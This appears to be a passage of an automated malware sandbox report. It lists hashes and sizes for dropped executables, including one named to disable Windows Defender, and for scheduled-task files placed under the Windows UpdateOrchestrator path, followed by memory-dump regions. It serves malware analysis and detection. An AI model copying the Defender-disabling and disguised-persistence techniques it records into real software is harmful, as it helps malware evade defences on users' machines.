                                                                                                                                                                                                                        27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        68KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        143b1a26c0fdda10f74ba1b6249e020a

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        30a01b28f4f205bc594f8d6665963eaa49d172e3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        108KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        22d6b7ab5c8a05162d36d2981b715c28

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69install.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        181KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        b89953da384c6a80b03e5b3abece33c9

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        8495ca680bc958f7b1c5525c2e92200fc9fa1864

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        f313c5b4f95605026428425586317353

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                                                                      • memory/380-622-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/380-621-0x000001E917FE0000-0x000001E91800C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/380-615-0x000001E917FE0000-0x000001E91800C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/616-588-0x000001AE00030000-0x000001AE0005C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/616-589-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/616-582-0x000001AE00030000-0x000001AE0005C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/616-581-0x000001AE00030000-0x000001AE0005C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/616-580-0x000001AE00000000-0x000001AE00026000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                      • memory/672-599-0x0000027962290000-0x00000279622BC000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/672-593-0x0000027962290000-0x00000279622BC000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/672-600-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/704-626-0x000001F94BC90000-0x000001F94BCBC000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/972-610-0x0000011E067C0000-0x0000011E067EC000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/972-611-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/972-604-0x0000011E067C0000-0x0000011E067EC000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                      • memory/980-23-0x0000000000FD0000-0x0000000000FE8000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        96KB

                                                                                                                                                                                                                      • memory/980-1433-0x000000001CC60000-0x000000001CC6A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                      • memory/1864-150-0x0000000000810000-0x0000000000841000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        196KB

                                                                                                                                                                                                                      • memory/2456-563-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/2456-1554-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/2612-305-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                      • memory/2612-45-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                      • memory/2864-1555-0x00000000009D0000-0x00000000009D9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/2864-157-0x00000000009D0000-0x00000000009D9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/3136-160-0x0000000000810000-0x0000000000841000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        196KB

                                                                                                                                                                                                                      • memory/3432-48-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                      • memory/3432-371-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                      • memory/3508-577-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-576-0x00007FFEEECA0000-0x00007FFEEED5E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        760KB

                                                                                                                                                                                                                      • memory/3508-570-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-569-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-568-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-567-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-572-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-575-0x00007FFEEF5D0000-0x00007FFEEF7C5000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/3956-17-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/3956-4-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/3956-3-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/3956-10-0x000001BB56610000-0x000001BB56632000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                      • memory/4092-565-0x00007FFEEF5D0000-0x00007FFEEF7C5000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/4092-564-0x000001F8F4720000-0x000001F8F474A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        168KB

                                                                                                                                                                                                                      • memory/4092-566-0x00007FFEEECA0000-0x00007FFEEED5E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        760KB

                                                                                                                                                                                                                      • memory/4120-562-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/4120-56-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/4120-1553-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/4904-55-0x00007FFED1623000-0x00007FFED1625000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4904-154-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/4904-0-0x00007FFED1623000-0x00007FFED1625000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4904-99-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/4904-1-0x0000000000E90000-0x0000000000EDE000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        312KB

                                                                                                                                                                                                                      • memory/4904-2-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB